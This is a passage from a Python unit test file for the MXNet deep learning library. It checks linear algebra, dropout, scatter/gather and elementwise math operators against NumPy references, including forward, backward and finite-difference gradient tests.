    check_bw = lambda sym, location, out_grads, expected :\
        check_symbolic_backward(sym, location, out_grads, expected,
                                rtol=rtol_fw, atol=atol_fw, dtype=dtype)
    # Tests for linalg.syevd
    test_syevd2 = _syevd_combined_symbol(data1)  # Outputs (U U^T, U^T (diag L) U)
    data1_s2 = _make_symm_symbol(data1, ndims=2)
    test_syevd_u_2 = _syevd_first_output(data1_s2)
    test_syevd_l_2 = _syevd_second_output(data1_s2)
    data1_s4 = _make_symm_symbol(data1, ndims=4)
    test_syevd_u_4 = _syevd_first_output(data1_s4)
    test_syevd_l_4 = _syevd_second_output(data1_s4)
    n_lst = [4, 1, 2, 10, 14]
    for n in n_lst:
        #print('\n** syevd: n={}'.format(n))
        # Symmetrize random input so syevd's precondition holds.
        data_in1 = np.random.normal(0., 10., (n, n))
        data_in1 = 0.5 * (data_in1 + data_in1.T)
        res_eye = np.eye(n)
        res_a = data_in1
        check_fw(test_syevd2, [data_in1], [res_eye, res_a])
        # Check backward
        grad_u = np.random.normal(0., 2., (n, n))
        grad_l = np.random.normal(0., 2., (n,))
        bw_u, bw_l = _syevd_forward(data_in1)
        grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
        check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
        if grad_check == 1:
            # A => U
            check_grad(test_syevd_u_2, [data_in1])
            # A => L
            check_grad(test_syevd_l_2, [data_in1])
        # Batch mode (3x the same thing)
        a_batch = rep_3x(data_in1, n, n)
        reye_batch = rep_3x(res_eye, n, n)
        ra_batch = a_batch
        check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
        if grad_check == 1:
            # A => U
            check_grad(test_syevd_u_4, [a_batch])
            # A => L
            check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
@with_seed()
def test_laop_4():
    """Check syevd forward against a hand-computed 2x2 eigendecomposition in both float dtypes."""
    # Currently disabled on GPU as syevd needs cuda8
    # and MxNet builds use cuda 7.5
    if not (default_context() == mx.cpu()):
        return
    rtol_fw = 1e-6
    atol_fw = 1e-6
    data1 = mx.symbol.Variable('data1')

    def check_fw(sym, location, expected, dtype):
        check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
                               atol=atol_fw, dtype=dtype)

    # Rank-1 symmetric matrix with known eigenpairs (eigenvalues 0 and 5).
    a_np = np.array([[1., 2.], [2., 4.]])
    u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
    l_np = np.array([0., 5.])
    test_syevd = mx.sym.linalg.syevd(data1)
    # Run the identical check once per dtype.
    for run_dtype in (np.float64, np.float32):
        check_fw(test_syevd, [a_np], [u_np, l_np], run_dtype)
def test_laop_5():
    """Roundtrip tests for diagonal/triangle extraction and generation operators
    (extractdiag, makediag, extracttrian, maketrian) over all offsets, batched
    and non-batched."""
    # NOTE(review): unlike the sibling tests, this one carries no @with_seed()
    # decorator - confirm whether that is intentional.
    # tests for diagonal and triangular matrix extraction and generation
    data = mx.symbol.Variable('data')
    # test complete range of small matrices to cover corner cases
    for n in range(1, 10):
        # test batched and non-batched processing
        for b in range(3):
            shape = (n, n) if b == 0 else (b, n, n)
            data_in = np.random.uniform(1, 10, shape)
            # test all legal offsets of the diagonal
            for offs in range(1-n, n):
                # test extraction of diagonal
                test_diag = mx.sym.linalg.extractdiag(data, offset=offs)
                res_diag = np.diagonal(data_in, offset=offs) if b==0 else np.diagonal(data_in, axis1=1, axis2=2, offset=offs)
                check_symbolic_forward(test_diag, [data_in], [res_diag])
                check_numeric_gradient(test_diag, [data_in])
                # test generation of diagonal matrix
                test_diag2 = mx.sym.linalg.makediag(data, offset=offs)
                res_diag2 = None
                if b == 0:
                    res_diag2 = np.diagflat(res_diag, k=offs)
                else:
                    # Build the batched expectation one sample at a time.
                    for i in range(b):
                        res = np.reshape(np.diagflat(res_diag[i], k=offs), (1, n, n))
                        res_diag2 = res if res_diag2 is None else np.concatenate((res_diag2, res), axis=0)
                check_symbolic_forward(test_diag2, [res_diag], [res_diag2])
                check_numeric_gradient(test_diag2, [res_diag])
                # check both settings for parameter "lower" in case of zero offset
                lower_vals = [True] if offs != 0 else [True, False]
                for lower in lower_vals:
                    # test extraction of triangle by doing a full roundtrip as the intermediate extracted
                    # triangle has different orderings than numpy.
                    test_trian = mx.sym.linalg.extracttrian(data, offset=offs, lower=lower)
                    test_trian = mx.sym.linalg.maketrian(test_trian, offset=offs, lower=lower)
                    # A negative offset (or zero offset with lower=True) selects the lower triangle.
                    extracts_lower = (offs < 0) or ((offs == 0) and lower)
                    res_trian = None
                    if b == 0:
                        res_trian = np.tril(data_in, offs) if extracts_lower else np.triu(data_in, offs)
                    else:
                        for i in range(b):
                            res = np.tril(data_in[i], offs) if extracts_lower else np.triu(data_in[i], offs)
                            res = np.reshape(res, (1, n, n))
                            res_trian = res if res_trian is None else np.concatenate((res_trian, res), axis=0)
                    check_symbolic_forward(test_trian, [data_in], [res_trian])
                    check_numeric_gradient(test_trian, [data_in])
# Tests for linalg.inverse
@with_seed()
def test_laop_6():
    """Check linalg.inverse: A @ inverse(A) must be the identity, plus a numeric gradient check."""
    dtype = np.float64
    rtol_fw = 1e-7
    atol_fw = 1e-9
    num_eps = 1e-6
    rtol_bw = 1e-4
    atol_bw = 1e-6
    data = mx.symbol.Variable('data')

    def check_fw(sym, location, expected):
        check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
                               atol=atol_fw, dtype=dtype)

    def check_grad(sym, location):
        check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
                               atol=atol_bw, dtype=dtype)

    # Batch of three identical invertible 4x4 matrices, identity as expectation.
    a = np.tile(np.sqrt(np.arange(4 * 4)).reshape(4, 4), (3, 1, 1))
    r = np.tile(np.eye(4), (3, 1, 1))
    test_inverse = mx.sym.linalg.inverse(data)
    test_eye = mx.sym.linalg.gemm2(data, test_inverse)
    check_fw(test_eye, [a], [r])
    check_grad(test_inverse, [a])
@with_seed()
def test_stack():
    """Compare mx.sym.stack against np.stack for random ranks, shapes, arities
    and axes (including negative axis indices)."""
    num_trials = 100
    for _ in range(num_trials):
        ndim = random.randint(1, 5)
        axis = random.randint(0, ndim)
        # Half the time, express the same axis as a negative index.
        if random.randint(0, 1):
            axis = axis - ndim - 1
        num_inputs = random.randint(1, 3)
        shape = [random.randint(1, 5) for _ in range(ndim)]
        arrays = [np.random.uniform(size=shape) for _ in range(num_inputs)]
        expected = np.stack(arrays, axis=axis)
        variables = [mx.sym.var('x%d' % i) for i in range(num_inputs)]
        stacked = mx.sym.stack(*variables, axis=axis)
        check_symbolic_forward(stacked, arrays, [expected])
        check_numeric_gradient(stacked, arrays)
@with_seed()
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/14288")
def test_dropout():
    """Dropout operator tests: per-ratio output scaling and zero counts,
    'always' mode, inference-mode passthrough, and axis-wise (broadcast) dropout."""
    def zero_count(array, ratio):
        # Count zeros; NaNs only occur (and count as dropped) when ratio == 1.
        zeros = 0
        for i in array:
            if i == 0:
                zeros += 1
            elif math.isnan(i):
                assert ratio == 1  # Only valid for ratio = 1
                zeros += 1
        return zeros
    def check_correctness(executor, input, ratio):
        # Validate that the fraction of dropped units and the sum of the output
        # are roughly consistent with the requested ratio.
        input = input.ravel()
        output = executor.outputs[0].asnumpy().ravel()
        input_sum = np.sum(input)
        output_sum = np.sum(output)
        # Make sure input zeroes are none (test data setup check)
        assert zero_count(input, ratio) == 0
        # count number of zeroes in output
        output_zeroes = zero_count(output, ratio)
        # Hopefully should be within ratio/2 %
        error = abs(output_sum - input_sum) / input_sum
        if ratio == 1.0:
            assert output_zeroes == len(input)
        elif ratio > 0.2:
            assert output_zeroes > 0
            assert error < (ratio/2)
        elif ratio == 0:
            assert output_zeroes == 0
    def check_dropout_ratio(ratio, shape, cudnn_off=True):
        # test dropout
        x = mx.sym.var('data')
        y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
        exe = y.simple_bind(ctx=default_context(), data=shape)
        # Surviving units are scaled by 1/(1-p)... here inputs are all 1, so the
        # only possible output values are 0 and 1/ratio complement; ratio==1
        # produces NaN (division by zero in the scaling).
        if ratio == 1:
            max_value = float('nan')
        else:
            max_value = 1 if ratio == 0 else 1/ratio
        if ratio == 1:
            min_value = float('nan')
        else:
            min_value = 1 if ratio == 0 else 0
        exe.arg_arrays[0][:] = 1
        exe.forward(is_train=True)
        if not math.isnan(max_value):
            assert exe.outputs[0].asnumpy().max() > 0
        else:
            assert math.isnan(exe.outputs[0].asnumpy().max())
        if not math.isnan(min_value):
            assert exe.outputs[0].asnumpy().min() == min_value
        else:
            assert math.isnan(exe.outputs[0].asnumpy().min())
        check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
        if ratio == 0.5:
            # Backward gradient equals the forward mask (inputs are all ones).
            exe.backward([mx.nd.ones(shape)])
            assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
            # Inference mode: dropout is the identity, gradient passes through.
            exe.forward(is_train=False)
            assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
            exe.backward([mx.nd.ones(shape)], is_train=False)
            assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
            # test permanent dropout
            x = mx.sym.var('data')
            y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
            exe = y.simple_bind(ctx=default_context(), data=shape)
            exe.arg_arrays[0][:] = 1
            exe.forward(is_train=True)
            assert exe.outputs[0].asnumpy().max() == max_value
            assert exe.outputs[0].asnumpy().min() == min_value
            exe.backward([mx.nd.ones(shape)])
            assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
            # mode='always' drops even with is_train=False.
            exe.forward(is_train=False)
            assert exe.outputs[0].asnumpy().max() == max_value
            assert exe.outputs[0].asnumpy().min() == min_value
            exe.backward([mx.nd.ones(shape)], is_train=False)
            assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
    def get_slice(x, axis, idx):
        # Index `x` with `idx` along `axis`, full slices everywhere else.
        ix = ()
        for i in range(x.ndim):
            if i == axis:
                ix += (idx,)
            else:
                ix += (slice(None, None, None),)
        return x[ix]
    def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
        # With dropout restricted to `axes`, every slice along a dropped axis
        # must share the same mask.
        compactshape = list(shape)
        for axis in axes:
            compactshape[axis] = 1
        compactx = mx.random.uniform(shape=tuple(compactshape))
        broadcastx = compactx.broadcast_to(shape)
        dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
        for axis in axes:
            target = get_slice(dropouty, axis, 0).asnumpy()
            for i in range(1, shape[axis]):
                assert(get_slice(dropouty, axis, i).asnumpy() == target).all()
    def check_passthrough(ratio, shape, cudnn_off=True):
        # test inference_mode forward and then backward
        a = mx.random.uniform(shape=shape)
        a.attach_grad()
        with mx.autograd.record(train_mode=False):
            b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off)  # dropout acts as identity
        b.backward()
        assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
    shape = (100, 100)
    check_dropout_ratio(0.5, shape)
    check_dropout_ratio(0.0, shape)
    check_dropout_ratio(1.0, shape)
    check_dropout_ratio(0.75, shape)
    check_dropout_ratio(0.25, shape)
    check_dropout_ratio(0.5, shape, cudnn_off=False)
    check_dropout_ratio(0.0, shape, cudnn_off=False)
    check_dropout_ratio(1.0, shape, cudnn_off=False)
    check_dropout_ratio(0.75, shape, cudnn_off=False)
    check_dropout_ratio(0.25, shape, cudnn_off=False)
    check_passthrough(0.5, shape)
    check_passthrough(0.0, shape)
    check_passthrough(1.0, shape)
    check_passthrough(0.5, shape, cudnn_off=False)
    check_passthrough(0.0, shape, cudnn_off=False)
    check_passthrough(1.0, shape, cudnn_off=False)
    nshape = (10, 10, 10, 10)
    with mx.autograd.train_mode():
        check_dropout_axes(0.25, nshape, axes = (0,))
        check_dropout_axes(0.25, nshape, axes = (1,))
        check_dropout_axes(0.25, nshape, axes = (2,))
        check_dropout_axes(0.25, nshape, axes = (3,))
        check_dropout_axes(0.25, nshape, axes = (0, 1))
        check_dropout_axes(0.25, nshape, axes = (0, 2))
        check_dropout_axes(0.25, nshape, axes = (0, 3))
        check_dropout_axes(0.25, nshape, axes = (1, 2))
        check_dropout_axes(0.25, nshape, axes = (1, 3))
        check_dropout_axes(0.25, nshape, axes = (2, 3))
        check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
        check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
        check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
        check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
        check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
        check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
        check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
        check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
        check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
        check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
        check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
        check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
        check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
        check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
        check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
        check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
@with_seed()
def test_scatter_gather_nd():
    """gather_nd forward/backward and scatter_nd / _backward_gather_nd
    consistency across dtypes, including accumulation of duplicate indices."""
    def check(data, idx):
        # gather_nd forward must match NumPy fancy indexing; its backward
        # (scattering y back) must match _backward_gather_nd.
        data.attach_grad()
        with mx.autograd.record():
            y = mx.nd.gather_nd(data, idx)
            y.backward(y)
        npidx = tuple(i.asnumpy() for i in idx)
        assert (data.asnumpy()[npidx] == y.asnumpy()).all()
        npdata = np.zeros_like(data.asnumpy())
        npdata[npidx] = y.asnumpy()
        assert (npdata == data.grad.asnumpy()).all()
        assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
    for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
        data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
        idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
        check(data, idx)
        idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
        check(data, idx)
        # scatter_nd overwrites on duplicate indices ...
        data = mx.nd.array([2, 3, 0], dtype=dtype)
        idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
        assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
        # ... while _backward_gather_nd accumulates them (2 + 3 == 5).
        data = mx.nd.array([2, 3, 0], dtype=dtype)
        idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
        assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
        # All 100 values accumulate into a single cell.
        data_npy = np.random.randint(0, 10, (100,))
        data = mx.nd.array(data_npy, dtype=dtype)
        idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
        assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
        if dtype == 'int64':
            # Values beyond float64's exact integer range: int64 accumulation must be exact.
            data = mx.nd.array([2123162361283621, -31231236374787,
                                -112372937128970, -1378278798172378], dtype=dtype)
            idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
            assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
def compare_forw_backw_unary_op(
        name, forward_mxnet_call, forward_numpy_call,
        backward_numpy_call, shape, input_low, input_high, rtol, atol,
        dtype=np.float32):
    """Compare an MXNet unary operator against NumPy references, forward and backward."""
    def check_fw(sym, location, expected):
        check_symbolic_forward(sym, location, expected, rtol=rtol,
                               atol=atol, dtype=dtype)

    def check_bw(sym, location, out_grads, expected):
        check_symbolic_backward(sym, location, out_grads, expected,
                                rtol=rtol, atol=atol, dtype=dtype)

    op_name = 'unary_op={}, dtype={}'.format(name, dtype)
    data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
    # Comparison: Forward expression over random input in the op's valid range.
    x = np.random.uniform(input_low, input_high, shape).astype(dtype)
    expected_fw = forward_numpy_call(x)
    # Adding zeros_like keeps the graph complete without changing values.
    op_ex = mx.sym.broadcast_add(
        forward_mxnet_call(data), mx.sym.zeros_like(data),
        name=op_name)
    check_fw(op_ex, [x], [expected_fw])
    # Comparison: Backward expression - chain an arbitrary output gradient
    # through the NumPy derivative.
    out_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
    expected_bw = backward_numpy_call(x) * out_grad
    check_bw(op_ex, [x], [out_grad], [expected_bw])
def finite_diff_unary_op(
        name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
        num_eps):
    """Numeric-gradient (finite difference) check for a unary operator."""
    # Finite difference tests are done in float64
    dtype = np.float64

    def check_grad(sym, location):
        check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
                               atol=atol, dtype=dtype)

    x = np.random.uniform(input_low, input_high, shape).astype(dtype)
    data = mx.symbol.Variable('data', dtype=dtype)
    op_name = 'unary_op={}, dtype={}'.format(name, dtype)
    # Adding zeros_like keeps the graph complete without changing values.
    op_ex = mx.sym.broadcast_add(
        forward_mxnet_call(data), mx.sym.zeros_like(data),
        name=op_name)
    check_grad(op_ex, [x])
def np_smooth_l1(x, sigma):
    """NumPy reference for smooth-L1: quadratic for |x| < 1/sigma^2, linear beyond."""
    threshold = 1. / sigma / sigma
    magnitude = np.abs(x)
    quadratic = 0.5 * ((x * sigma) ** 2)
    linear = magnitude - 0.5 * threshold
    return np.where(magnitude < threshold, quadratic, linear)
def np_smooth_l1_grad(x, sigma):
    """Derivative of np_smooth_l1: slope x*sigma^2 in the quadratic zone, sign(x) outside."""
    ssq = sigma * sigma
    in_quadratic_zone = np.abs(x) < 1. / ssq
    return np.where(in_quadratic_zone, x * ssq, np.sign(x))
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@with_seed(192837465)
def test_unary_math_operators():
    """Compare unary math operators against NumPy/SciPy references (forward and
    backward, in float64/float32/float16) and run float64 finite-difference
    gradient checks for each."""
    have_scipy = True
    try:
        from scipy import special as scipy_special
    except:
        print("Could not import scipy. Skipping unit tests for special functions")
        have_scipy = False
    shape=(9, 10)
    # Tolerances per dtype; the *_less_* lists are looser and used for the
    # SciPy special functions.
    dtype_l = [np.float64, np.float32, np.float16]
    rtol_l = [1e-7, 1e-6, 1e-2]
    rtol_less_l = [1e-6, 1e-5, 1e-2]
    atol_l = [1e-7, 1e-6, 1e-2]
    atol_less_l = [1e-6, 1e-5, 1e-2]
    rtol_fd = 1e-5
    atol_fd = 1e-6
    num_eps = 1e-6
    # Each entry: [mxnet op, numpy forward reference, numpy derivative,
    #              input_low, input_high] - the range keeps inputs inside the
    # op's domain (e.g. |x| < 1 for arccos/arctanh, x > 0 for log/sqrt).
    unary_ops = {
        'arccos' : [lambda x: mx.sym.arccos(x),
                    lambda x: np.arccos(x),
                    lambda x: -1. / np.sqrt(1. - x ** 2.),
                    -0.95, 0.95],
        'arccosh': [lambda x: mx.sym.arccosh(x),
                    lambda x: np.arccosh(x),
                    lambda x: 1. / np.sqrt(x ** 2 - 1.),
                    1.05, 10.0],
        'arcsin': [lambda x: mx.sym.arcsin(x),
                   lambda x: np.arcsin(x),
                   lambda x: 1. / np.sqrt(1. - x ** 2),
                   -0.95, 0.95],
        'arcsinh': [lambda x: mx.sym.arcsinh(x),
                    lambda x: np.arcsinh(x),
                    lambda x: 1. / np.sqrt(x**2 + 1.),
                    -5.0, 5.0],
        'arctan': [lambda x: mx.sym.arctan(x),
                   lambda x: np.arctan(x),
                   lambda x: 1. / (x ** 2. + 1.),
                   -5.0, 5.0],
        'arctanh': [lambda x: mx.sym.arctanh(x),
                    lambda x: np.arctanh(x),
                    lambda x: 1. / (1. - x ** 2),
                    -0.95, 0.95],
        'cbrt': [lambda x: mx.sym.cbrt(x),
                 lambda x: np.cbrt(x),
                 lambda x: 1. / (3. * np.cbrt(x) ** 2),
                 -10.0, 10.0],
        'cos': [lambda x: mx.sym.cos(x),
                lambda x: np.cos(x),
                lambda x: -np.sin(x),
                -5.0, 5.0],
        'cosh': [lambda x: mx.sym.cosh(x),
                 lambda x: np.cosh(x),
                 lambda x: np.sinh(x),
                 -2.0, 2.0],
        'exp': [lambda x: mx.sym.exp(x),
                lambda x: np.exp(x),
                lambda x: np.exp(x),
                -4.0, 4.0],
        'expm1': [lambda x: mx.sym.expm1(x),
                  lambda x: np.expm1(x),
                  lambda x: np.exp(x),
                  -0.1, 0.1],
        'log': [lambda x: mx.sym.log(x),
                lambda x: np.log(x),
                lambda x: 1. / x,
                0.01, 100.0],
        'log10': [lambda x: mx.sym.log10(x),
                  lambda x: np.log10(x),
                  lambda x: 1. / (x * np.log(10.)),
                  0.01, 100.0],
        'log2': [lambda x: mx.sym.log2(x),
                 lambda x: np.log2(x),
                 lambda x: 1. / (x * np.log(2.)),
                 0.01, 100.0],
        'log1p': [lambda x: mx.sym.log1p(x),
                  lambda x: np.log1p(x),
                  lambda x: 1. / (1. + x),
                  -0.1, 0.1],
        'rcbrt': [lambda x: mx.sym.rcbrt(x),
                  lambda x: 1. / np.cbrt(x),
                  lambda x: -1. / (3. * x * np.cbrt(x)),
                  0.01, 100.0],
        'reciprocal': [lambda x: mx.sym.reciprocal(x),
                       lambda x: 1. / x,
                       lambda x: -1. / (x ** 2),
                       0.01, 100.0],
        'relu': [lambda x: mx.sym.relu(x),
                 lambda x: np.maximum(x, 0.),
                 lambda x: 1. * (x > 0.),
                 -5.0, 5.0],
        'rsqrt': [lambda x: mx.sym.rsqrt(x),
                  lambda x: 1. / np.sqrt(x),
                  lambda x: -0.5 / (x * np.sqrt(x)),
                  0.01, 100.0],
        'sigmoid': [lambda x: mx.sym.sigmoid(x),
                    lambda x: 1. / (np.exp(-x) + 1.),
                    lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
                    -3.0, 3.0],
        'softsign': [lambda x: mx.sym.softsign(x),
                     lambda x: x / (1. + np.abs(x)),
                     lambda x: 1. / np.square(1. + np.abs(x)),
                     -3.0, 3.0],
        'sin': [lambda x: mx.sym.sin(x),
                lambda x: np.sin(x),
                lambda x: np.cos(x),
                -5.0, 5.0],
        'sinh': [lambda x: mx.sym.sinh(x),
                 lambda x: np.sinh(x),
                 lambda x: np.cosh(x),
                 -2.0, 2.0],
        'sqrt': [lambda x: mx.sym.sqrt(x),
                 lambda x: np.sqrt(x),
                 lambda x: 0.5 / np.sqrt(x),
                 0.01, 100.0],
        'tan': [lambda x: mx.sym.tan(x),
                lambda x: np.tan(x),
                lambda x: np.tan(x) ** 2 + 1.,
                -1.5, 1.5],
        'tanh': [lambda x: mx.sym.tanh(x),
                 lambda x: np.tanh(x),
                 lambda x: 1. - np.tanh(x) ** 2,
                 -4.0, 4.0],
        'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
                           lambda x: np_smooth_l1(x, 1.),
                           lambda x: np_smooth_l1_grad(x, 1.),
                           -2.0, 2.0],
        'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
                                  lambda x: np_smooth_l1(x, 1.),
                                  lambda x: np_smooth_l1_grad(x, 1.),
                                  -2.0, 2.0],
        'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
                           lambda x: np_smooth_l1(x, 2.),
                           lambda x: np_smooth_l1_grad(x, 2.),
                           -1.0, 1.0]
    }
    if have_scipy:
        unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
                              lambda x: scipy_special.gamma(x),
                              lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
                              0.01, 5.0]
        unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
                                lambda x: scipy_special.gammaln(x),
                                lambda x: scipy_special.psi(x),
                                0.01, 20.0]
    # Loop over operators
    for name, op in unary_ops.items():
        # Loop over dtype's
        for ind in range(len(dtype_l)):
            dtype = dtype_l[ind]
            # gamma/gammaln get the looser tolerances.
            if name == 'gammaln' or name == 'gamma':
                rtol = rtol_less_l[ind]
                atol = atol_less_l[ind]
            else:
                rtol = rtol_l[ind]
                atol = atol_l[ind]
            compare_forw_backw_unary_op(
                name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
                dtype)
        # Finite difference testing
        finite_diff_unary_op(
            name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
        name, forward_mxnet_call, forward_numpy_call,
        backward1_numpy_call, backward2_numpy_call, shape, input1_low,
        input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
    """Compare an mxnet binary operator against its NumPy reference.

    Forward outputs and the gradients w.r.t. both inputs are checked
    against ``forward_numpy_call`` / ``backward{1,2}_numpy_call`` on
    random uniform inputs drawn from the per-input [low, high] ranges.
    """
    def check_fw(sym, location, expected):
        check_symbolic_forward(sym, location, expected, rtol=rtol,
                               atol=atol, dtype=dtype)

    def check_bw(sym, location, out_grads, expected):
        check_symbolic_backward(sym, location, out_grads, expected,
                                rtol=rtol, atol=atol, dtype=dtype)

    op_name = 'binary_op={}, dtype={}'.format(name, dtype)
    lhs = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
    rhs = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
    lhs_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
    rhs_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
    expected_out = forward_numpy_call(lhs_np, rhs_np)
    # The broadcast_add with zeros leaves the values unchanged; it only
    # gives the graph a named output node wrapping the op under test.
    op_ex = mx.sym.broadcast_add(
        forward_mxnet_call(lhs, rhs), mx.sym.zeros_like(lhs),
        name=op_name)
    # Forward comparison against the NumPy reference.
    check_fw(op_ex, [lhs_np, rhs_np], [expected_out])
    # Backward: analytic per-input gradients scaled by a random head grad.
    head_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
    grad_lhs = backward1_numpy_call(lhs_np, rhs_np) * head_grad
    grad_rhs = backward2_numpy_call(lhs_np, rhs_np) * head_grad
    check_bw(op_ex, [lhs_np, rhs_np], [head_grad], [grad_lhs, grad_rhs])
def finite_diff_binary_op(
        name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
        input2_high, rtol, atol, num_eps):
    """Numeric-gradient (finite difference) check for a binary operator.

    Always runs in float64 for finite-difference accuracy.
    """
    dtype = np.float64

    def check_grad(sym, location):
        check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
                               atol=atol, dtype=dtype)

    lhs_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
    rhs_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
    lhs = mx.symbol.Variable('data1', dtype=dtype)
    rhs = mx.symbol.Variable('data2', dtype=dtype)
    op_name = 'binary_op={}, dtype={}'.format(name, dtype)
    # Adding zeros leaves the values untouched but mirrors the symbolic
    # structure used by compare_forw_backw_binary_op.
    op_ex = mx.sym.broadcast_add(
        forward_mxnet_call(lhs, rhs), mx.sym.zeros_like(lhs),
        name=op_name)
    check_grad(op_ex, [lhs_np, rhs_np])
# Tests for binary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
@with_seed()
def test_binary_math_operators():
    """Forward/backward NumPy comparison plus finite-difference checks
    for elementwise binary math operators (hypot, pow, power)."""
    shape = (9, 10)
    # Per-dtype tolerances: float64, float32, float16.
    dtype_l = [np.float64, np.float32, np.float16]
    rtol_l = [1e-7, 1e-6, 1e-2]
    atol_l = [1e-7, 1e-6, 1e-2]
    rtol_fd = 1e-5
    atol_fd = 1e-6
    num_eps = 1e-6
    # Entry layout: [mx op, numpy fwd, d/dx, d/dy, x_low, x_high, y_low, y_high]
    binary_ops = {
        'hypot': [
            lambda x, y: mx.sym.hypot(x, y),
            lambda x, y: np.hypot(x, y),
            lambda x, y: x / np.hypot(x, y),
            lambda x, y: y / np.hypot(x, y),
            -5.0, 5.0, -5.0, 5.0],
        'pow': [
            lambda x, y: mx.sym.pow(x, y),
            lambda x, y: np.power(x, y),
            lambda x, y: np.power(x, y - 1.) * y,
            lambda x, y: np.power(x, y) * np.log(x),
            0.2, 5.0, -4.0, 4.0],
        'power': [
            lambda x, y: mx.sym.power(x, y),
            lambda x, y: np.power(x, y),
            lambda x, y: np.power(x, y - 1.) * y,
            lambda x, y: np.power(x, y) * np.log(x),
            0.2, 5.0, -4.0, 4.0],
    }
    for name, op in binary_ops.items():
        mx_op, np_fw, np_bw1, np_bw2, lo1, hi1, lo2, hi2 = op
        # NumPy comparison at every dtype.
